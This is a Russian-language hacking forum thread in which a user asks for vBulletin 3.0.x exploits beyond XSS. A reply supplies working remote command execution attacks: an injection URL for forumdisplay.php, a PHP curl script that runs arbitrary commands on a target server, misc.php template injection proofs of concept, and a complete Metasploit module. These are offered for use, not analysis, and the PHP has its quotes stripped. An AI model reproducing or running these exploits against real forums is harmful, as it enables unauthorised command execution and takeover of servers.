Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Страницы: 1
RSS
vBulletin Version 3.0.3
 
что-нибуть ещё есть, кроме XSS? Поделитесь опытом, времени ковырять код - нет.
спасибо.
GoBiz
 
с уязвимостью в misc.php <a href=http://www.securitylab.ru/52879.html rel="nofollow" target="_blank">http://www.securitylab.ru/52879.html</a>; не понятно - грузится пустая страница и всё. Тыкните пальцем, в чем проблема?
GoBiz
 
скачай metasploit себе

а вообще вот:

Код
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system(id)."

Conditions:
----------------
1st condition&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: $vboptions[showforumusers] == True , the admin must set
&nbsp;&nbsp;&nbsp;&nbsp;showforumusers ON in vbulletin options.

2nd condition&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: $bbuserinfo[userid] == 0 , you must be an visitor/guest.

3rd condition&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: $DB_site->fetch_array($forumusers) == True , when you
&nbsp;&nbsp;&nbsp;&nbsp;visit the forums, it  must has at least one user show the forum.

4th condition&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: magic_quotes_gpc must be OFF

SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
&nbsp;&nbsp;&nbsp;&nbsp;init.php by secret array GLOBALS[]=1 ;)))


Код
<?php
 /*********************************************************** ***
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions[showforumusers] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo[userid] == 0 , you must be an visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
# 
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
# 
 ************************************************************ **/

if (!(function_exists(curl_init))) {
echo "cURL extension required\n";
exit;
}

if ($argv[3]){
$url = $argv[1];
$forumid = intval($argv[2]);
$command = $argv[3];
}
else {
echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
echo "<forumid> forum id\n";
echo "<command> command to execute on server (ex: ls -la)\n";
echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
echo "ex :\n";
echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";

exit;
}

if ($argv[4])
$proxy = $argv[4];



$action = forumdisplay.php?GLOBALS[]=1&f=.$forumid.&comma=".echo _START_..$command..echo _END_.";

$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url./.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$res = substr($res, strpos($res, _START_)+7);
$res = substr($res,0, strpos($res, _END_));
echo $res;


?>


Код
# Tested on vBulletin Version 3.0.1 /str0ke 
# http://www.xxx.net/misc.php?do=page&template={${system(id)}} 
#

# [SCAN Associates Security Advisory]
# http://www.scan-associates.net

Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}


Код
##
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Title: vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit
#&nbsp;&nbsp;&nbsp;&nbsp;Name: php_vb3_0_6.pm
# License: Artistic/BSD/GPL
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;  Info: trying to get the command execution exploits out of the way on milw0rm.com. Ms are always good.
#
#
#  - This is an exploit module for the Metasploit Framework, please see
 #&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;http://metasploit.com/project s/Framework for more information.
##

package Msf::Exploit::php_vb3_0_6;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;

my $advanced = { };

my $info = {
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> vBulletin <= 3.0.6 (Add Template Name in HTML Comments = Yes) command execution eXploit,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Version  => $Revision: 1.0 $,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Authors  => [ str0ke ],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Arch&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> [ ],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; OS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> [ ],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Priv&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> 0,
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; UserOpts =>
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  RHOST => [1, ADDR, The target address],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  RPORT => [1, PORT, The target port, 80],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  VHOST => [0, DATA, The virtual host name of the server],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  RPATH => [1, DATA, Path to the misc.php script, /forum/misc.php],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  SSL&nbsp;&nbsp;&nbsp;=> [0, BOOL, Use SSL],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; },

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Description => Pex::Text::Freeform(qq{
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  This module exploits a code execution flaw in vBulletin <= 3.0.6.
}),

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Refs =>
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  [MIL, 832],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ],

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Payload =>
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  Space => 512,
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  Keys  => [cmd, cmd_bash],
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; },

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Keys => [vBulletin],
  };

sub new {
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $class = shift;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $self = $class->SUPER::new({Info => $info, Advanced => $advanced}, @_);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return($self);
}

sub Exploit {
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $self = shift;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $target_host&nbsp;&nbsp;&nbsp;&nbsp;= $self->GetVar(RHOST);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $target_port&nbsp;&nbsp;&nbsp;&nbsp;= $self->GetVar(RPORT);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my  $vhost&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;= $self->GetVar(VHOST) || $target_host;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my  $path&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;& nbsp;&nbsp;= $self->GetVar(RPATH);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my  $cmd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;&nbsp;= $self->GetVar(EncodedPayload)->RawPayload;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Encode the command as a set of chr() function calls
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $byte = join(., map { $_ = chr(.$_.) } unpack(C*, $cmd));

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; # Create the get request data
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $data = "?do=page&template={\${passthru($byte)}}";

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $req =
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "GET $path$data HTTP/1.1\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "Host: $vhost:$target_port\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "Content-Type: application/html\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "Content-Length: ". length($data)."\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "Connection: Close\r\n".
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  "\r\n";

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $s = Msf::Socket::Tcp->new(
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  PeerAddr  => $target_host,
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  PeerPort  => $target_port,
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  LocalPort => $self->GetVar(CPORT),
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  SSL&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=> $self->GetVar(SSL),
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; );

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if ($s->IsError){
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  $self->PrintLine([*] Error creating socket:  . $s->GetError);
 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;  return;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $self->PrintLine("[*] Sending the malicious vBulletin Get request...");

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s->Send($req);

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $results = $s->Recv(-1, 20);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $s->Close();

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return;
}

1;
We're Warriors. Warriors of the World! © ManOwaR

От Тайги до британских морей - руськие хакиры всех сильней!
Страницы: 1
Читают тему (гостей: 1)